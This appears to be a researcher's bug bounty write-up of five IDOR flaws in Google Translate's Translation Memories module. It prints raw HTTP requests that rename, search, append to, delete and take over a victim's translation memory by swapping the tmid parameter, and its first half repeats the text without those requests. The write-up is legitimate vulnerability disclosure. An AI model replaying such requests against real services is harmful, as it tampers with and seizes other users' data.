Hello,
I found 5 IDORs in Translation Memories.
HTTP Request :
2. IDOR to search from victim's Translation Memory :
An attacker was able to search from victim's translation memory because there was lack of proper ACLs at this endpoint too.
HTTP Request :
3. IDOR to replace or add .tmx file into victim's Translation Memory :
You may find something about .tmx file from Here. I used such .tmx file to add some data into victim's Translation Memory. I was able to replace or combine .tmx data into victim's translation memory because of lack of proper ACLs on uploading .tmx file into a Translation Memory.
HTTP Request :
4. IDOR to delete victim's Translation Memory :
Yeah!! Also, There was no ACLs at this endpoint. So an attacker was able to delete victim's translation memory using a simple IDOR mechanism.
HTTP Request :
5. IDOR to takeover victim's Translation Memory :
There was no ACLs on sharing a Translation Memory with an user. So an attacker was able to share victim's Translation Memory with himself to be an owner of that particular Translation Memory.
HTTP Request :
In short, i was able to modify victim's Translation Memory.
For all requests, tmid(s) was a vulnerable parameter!
That's all ;)
Due to low-sensitive data leakage, i received a combined bounty of $3133.7 from Google.
Thank you for reading! :-)
-Shailesh Suthar
Shailesh here!
There is a module named "Translation Toolkit" in https://translate.google.com and i found that a sub-module named "Translation Memories" was fully vulnerable to IDOR vulnerabilities!
I found 5 IDORs in Translation Memories.
1. IDOR to change name of victim's Translation Memory :
An attacker was able to change name of victim's translation memory because there was lack of proper ACLs at this endpoint.HTTP Request :
POST /toolkit/utmname?hl=en HTTP/1.1
Host: translate.google.com
..
security_token=AKrFfvIvi97LGuNHa3w_vpTZyWwPszzm5g%3A1467183119818&tmid=8a73972848d860ed&tmname=renamed_by_attacker
2. IDOR to search from victim's Translation Memory :
An attacker was able to search from victim's translation memory because there was lack of proper ACLs at this endpoint too.
HTTP Request :
POST /toolkit/gettm HTTP/1.1
Host: translate.google.com
...
hl=en&src=a&sl=en&tl=sq&tmids=1e0cd01b8a7bde44&thld=0&mofmt=true
3. IDOR to replace or add .tmx file into victim's Translation Memory :
You may find something about .tmx file from Here. I used such .tmx file to add some data into victim's Translation Memory. I was able to replace or combine .tmx data into victim's translation memory because of lack of proper ACLs on uploading .tmx file into a Translation Memory.
HTTP Request :
POST /toolkit/tmappend?hl=en HTTP/1.1
Host: translate.google.com
..
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="security_token"
AKrFfvKLf60q11l-TlCENLERqMD0KI9LAA:1447909448118
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tmid"
07a132fa949ac969
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tloc"; filename="my_memory (1).tmx"
Content-Type: application/octet-stream
<XML>...
------WebKitFormBoundarymGTgNNHKz4FAMIdY--
4. IDOR to delete victim's Translation Memory :
Yeah!! Also, There was no ACLs at this endpoint. So an attacker was able to delete victim's translation memory using a simple IDOR mechanism.
HTTP Request :
POST /toolkit/deletetm HTTP/1.1
Host: translate.google.com
..
hl=en&tmids=850b211b36c39a1e&security_token=AKrFfvKaPs2JVm4aGg8xLSyE_-o1RMc-Uw%3A1467184220688
5. IDOR to takeover victim's Translation Memory :
There was no ACLs on sharing a Translation Memory with an user. So an attacker was able to share victim's Translation Memory with himself to be an owner of that particular Translation Memory.
HTTP Request :
POST /toolkit/utminfo HTTP/1.1
Host: translate.google.com
Connection: keep-alive
Content-Length: 396
...
hl=en&tmid=1e0cd01b8a7bde44&acl=[{"access":7,"me":true,"email":"victim.dummy.4594@gmail.com"},{"access":7,"email":"attacker.dummy.4594@gmail.com"},{"email":"@gmail.com","access":7,"caa":false,"new":true}]&ntfy=true©=false&security_token=xxxxxx:144786375312
In short, i was able to modify victim's Translation Memory.
For all requests, tmid(s) was a vulnerable parameter!
That's all ;)
Due to low-sensitive data leakage, i received a combined bounty of $3133.7 from Google.
Thank you for reading! :-)
-Shailesh Suthar